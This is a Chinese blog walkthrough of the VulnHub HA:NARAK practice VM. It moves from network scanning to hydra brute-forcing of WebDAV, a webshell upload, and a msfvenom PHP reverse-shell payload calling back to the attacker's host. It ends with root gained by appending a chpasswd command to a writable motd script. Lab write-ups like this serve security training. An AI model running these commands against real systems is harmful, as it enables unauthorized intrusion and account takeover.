VulnHub渗透测试实战靶场-HA:NARAK

环境下载

HA:NARAK靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.140
  • 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.246.140sudo nmap -sU -Pn 192.168.246.140,发现开放了 22、68、69、80 四个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.140

漏洞挖掘

  • 访问 192.168.246.140/webdav 发现需要用户名和密码进行登录,使用 cewl 生成 worldlist 后利用 hydra 进行爆破,得到一组用户名和密码:yamdoot:Swarg
cewl http://192.168.246.140 -w wordlist.txt

hydra -L wordlist.txt -P wordlist.txt -f -V 192.168.246.140 http-get /webdav

getshell

  • 搜索 webdav 相关漏洞利用方式后发现可以 cadaver 执行 put 命令来上传一个 shell
  • 使用 msfvenom 生成反弹 shell 的木马或者直接利用 Kali 自带的 webshell,将木马上传上去,访问该木马即可接收到反弹 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.246.129 LPORT=1234 R > shell.php

提权

  • 翻阅信息,在 /mnt 下发现一个文件 hell.sh,查看该文件发现一串 Brainfuck 编码,解码后得到 chitragupt
  • 尝试利用 chitragupt 作为密码,利用 Home 目录下的用户进行登录
  • 用 python 起一个 http 服务,将 linpeas.sh 上传到目标靶机,并给 linpeas.sh 加上权限
  • 运行 linpeas.sh,发现 /etc/update-motd.d/ 目录下部分文件可写入
  • 修改 etc/update-motd.d/00-header 文件,将 root 的密码修改掉
echo "echo 'root:d1no' | sudo chpasswd" >> 00-header
  • 重新登录 ssh,使写入的内容执行,成功拿到 root 权限
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值